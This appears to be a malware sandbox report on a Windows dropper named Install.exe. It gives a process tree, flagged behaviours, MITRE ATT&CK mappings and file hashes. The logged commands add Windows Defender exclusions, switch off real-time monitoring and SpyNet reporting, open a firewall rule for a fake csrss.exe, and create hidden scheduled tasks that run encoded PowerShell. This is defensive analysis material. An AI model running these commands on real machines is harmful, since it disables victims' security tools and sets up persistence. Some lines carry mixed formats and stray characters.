C:\Users\Admin\Pictures\zP1vBkts9eMW4Mc2oRVOrTfC.exe"C:\Users\Admin\Pictures\zP1vBkts9eMW4Mc2oRVOrTfC.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\7zSE531.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\7zSEA6E.tmp\Install.exe.\Install.exe /LzfYdidLoSR "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
PID:1884 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:1520
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:1668
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:1320
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:2816
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtzrKiwwP" /SC once /ST 05:01:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:1748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtzrKiwwP"6⤵PID:560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtzrKiwwP"6⤵PID:268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmfUAJAHieefCXsdaD" /SC once /ST 19:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\vPxFIBw.exe\" hp /oIsite_idbJe 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2104
-
-
-
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240126190528.log C:\Windows\Logs\CBS\CbsPersist_20240126190528.cab1⤵PID:2620
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:3024
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:1208
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:321⤵PID:1432
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:641⤵PID:2200
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&1⤵PID:2300
-
C:\Windows\system32\taskeng.exetaskeng.exe {D424D445-8F23-4681-A850-FC3D99EF06D0} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]1⤵PID:2748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2068
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1696 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1708
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2100 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:868
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:2332
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1988
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1820
-
C:\Windows\system32\taskeng.exetaskeng.exe {FFE1FAC0-22B3-4E6A-B9BA-E05B083162BE} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:268
-
C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\vPxFIBw.exeC:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\vPxFIBw.exe hp /oIsite_idbJe 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1688 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjfANrGUB" /SC once /ST 13:07:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjfANrGUB"3⤵PID:1340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjfANrGUB"3⤵PID:2836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwHUbLjLK" /SC once /ST 13:45:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwHUbLjLK"3⤵PID:2624
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:2688
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwHUbLjLK"3⤵PID:1048
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:323⤵PID:920
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:643⤵PID:2552
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:323⤵PID:3040
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:324⤵PID:2036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:643⤵PID:2488
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:644⤵PID:2472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\fgekRaJKKiJdEvwV\WJKnJFKC\nsiBHSaPEZAAMOMz.wsf"3⤵PID:1516
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\fgekRaJKKiJdEvwV\WJKnJFKC\nsiBHSaPEZAAMOMz.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1192 -
[level 4, PID 2332] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
[level 4, PID 1812] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
[level 4, PID 1488] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
[level 4, PID 2400] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
[level 4, PID 2784] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
[level 4, PID 1808] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
[level 4, PID 2596] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
[level 4, PID 2592] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
[level 4, PID 1540] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
[level 4, PID 2932] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
[level 4, PID 1880] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
[level 4, PID 1504] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
[level 4, PID 2608] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
[level 4, PID 1624] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
[level 4, PID 2348] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
[level 4, PID 2376] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
[level 4, PID 1232] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
[level 4, PID 1068] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
[level 4, PID 2688] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:32
[level 4, PID 2636] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:64
[level 4, PID 828] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:32
[level 4, PID 1568] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:64
[level 4, PID 572] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:32
[level 4, PID 2992] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:64
[level 4, PID 1180] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:32
[level 4, PID 1632] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:64
[level 4, PID 2100] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:32
[level 4, PID 1548] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:64
[level 4, PID 2824] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:32
[level 4, PID 1572] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:64
[level 4, PID 744] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
[level 4, PID 2892] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
[level 4, PID 2976] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:32
[level 4, PID 2684] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:64
[level 4, PID 2404] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
[level 4, PID 2396] C:\Windows\SysWOW64\reg.exe  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
[level 3, PID 320] C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "gDYwKOjSZ" /SC once /ST 08:45:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  - Creates scheduled task(s)
  (The -EncodedCommand value is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force, which matches the gpscript.exe /RefreshSystemParam processes below.)
[level 3, PID 1872] C:\Windows\SysWOW64\schtasks.exe  schtasks /run /I /tn "gDYwKOjSZ"
[level 1, PID 2832] C:\Windows\system32\gpscript.exe  gpscript.exe /RefreshSystemParam
[level 1, PID 2816] C:\Windows\system32\conhost.exe  \??\C:\Windows\system32\conhost.exe "-544128334692423542-14902482081750557387581246421-1038148571-2474275341776496028"
[level 1, PID 560] C:\Windows\system32\conhost.exe  \??\C:\Windows\system32\conhost.exe "1391998775770038919-561037561-13593700461551061522-12061071761632198851436464813"
[level 1, PID 1748] C:\Windows\SysWOW64\reg.exe  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
  - Modifies Windows Defender Real-time Protection settings
[level 1, PID 2760] C:\Windows\SysWOW64\reg.exe  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
  - Modifies Windows Defender Real-time Protection settings
[level 1, PID 2804] C:\Windows\system32\gpscript.exe  gpscript.exe /RefreshSystemParam
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Scheduled Task/Job (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Scheduled Task/Job (1)
Downloads
-
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: b8b62282cde4864df30e9b2aa0c17894
  SHA1: c998fa0456fbf49fe4ad3878abe9cb20f600c958
  SHA256: 3018c8bb6a97bc9f8a6fda8e649a786cb3b3d6def4f1ef36d7f0a2b8bc146438
  SHA512: 1acec9e73882ab056f0c67052925d56db1b42ac4353edd68c63b6bf04ee4589ee703b2e150aa61d48241754d11f83021bfbe87057e12abbc547f7384b73bc94e
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: e3dc201ecb25d774705adf851d9c9390
  SHA1: 5b608c1052aded851164a146e6f93bb1c47e1b2a
  SHA256: 9a3110ba99ae54fe8f356f352171bd7483b5d4df114e519660f93d739444d200
  SHA512: 9d3e8d34ed9d9358d8b63f90d5b633af763ff56797f13cc977e977439cbb00b5c3b3c66523083cd6199e8ebc407a72fba14705fa004dd6956df02dc5cb1b91ab
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: 0e62b45ecbb2075973c5d9596b5ff9c3
  SHA1: ee4d204d100d74367f5130210de8a33b22b24816
  SHA256: e8801cb557b73c38a2b796bdf8fc2d115d6ee5e005caf80c4a9606b68d1ba8f8
  SHA512: 93b32a65a8906df2b1501cdb835c2c7eb403142b2e95552f50c93cf2cea1be943e76188b1ee8933e2764116c58498b2db0c0d9daf82d369139b4852a979fae83
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: b78c8982fd672cbcebe0f60d5f0f1ae0
  SHA1: bee67652e05d389ba8cd322a84f946ff3f5e44cf
  SHA256: e2937807a4233fad19aea26c6330ad07e74f94165e12e280d58746f949ddb3d0
  SHA512: d8b593c88652543067f697be6e971e1880f48c1ea4b0d2904dd4ae31dc2738a9150d0a8ba1fc8b264140438cf25530a10163851137124c6bb4966386ae3d6bda
- Filesize: 174KB
  MD5: 021b6da432b894947638c5a3bdf09e54
  SHA1: 80571208ab4d80a7a7eeb93695b830d3e77e8560
  SHA256: ce74f79f0c487e8971b10f875f0aec1fea149753f5f2e932e4f1f71a546cb2d9
  SHA512: 649eb07e5eafc0e23a71ace578ece79d54e244b0f7f3cabefb9c1007987055b0338c4bee62b6c0d81d031cca6cdb7fcb3f136731f092b784f25918bb98008e50
- Filesize: 85KB
  MD5: 9cd365e87d9f835b91e944d468ac39c1
  SHA1: d0ff0a1cae23281e56c4774bc56c2d6e4b93905d
  SHA256: f4be7279495b20da0f667e150f877298ba5e0d9af77e3974f4eb1812eeef32e6
  SHA512: 45ea8400b9db7e6619cba32a85b537af008fbd4449e2f6f5fc7dd45209d9e9dbd95380f5611ee29f4451dbb180bdebb28630dc3f2ae84d9b1d772a0777d3f444
- Filesize: 152KB
  MD5: 0874dc22b0461b86b646ed9c27c2b92e
  SHA1: e810bd2c1bbca8a2c57282bbfeacf4378fed691f
  SHA256: 50a7c15d3367825f93c2ec123a8d6586ac77ae1778890dc373e3c539464bba1d
  SHA512: 44afbf7ba621ff788815977058004ffd704ddb4f5ed8f7224e810c937f8d9350bf9d0f82628c280bd0d0c4ffa17213787d028d086b6349ab5bfa5fc444be8980
- Filesize: 867KB
  MD5: f1e629bba7e4973222666d90261c85bd
  SHA1: 5389c7fbfc9733a8ece2abe4a850860033e2b9f1
  SHA256: cc0bcf7318316b19225d4377d3de4e2cd3bee2255f760418035847b762ee3be3
  SHA512: 29f4ce5e003cbd615afb8b44da966dec701b94bc289d735dd432d1ac4054c365440adf2fd60e6ffbfbdcc6ae8fb4acc0580243010ab70f4a8ac0b46301e29f7b
- Filesize: 65KB
  MD5: ac05d27423a85adc1622c714f2cb6184
  SHA1: b0fe2b1abddb97837ea0195be70ab2ff14d43198
  SHA256: c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
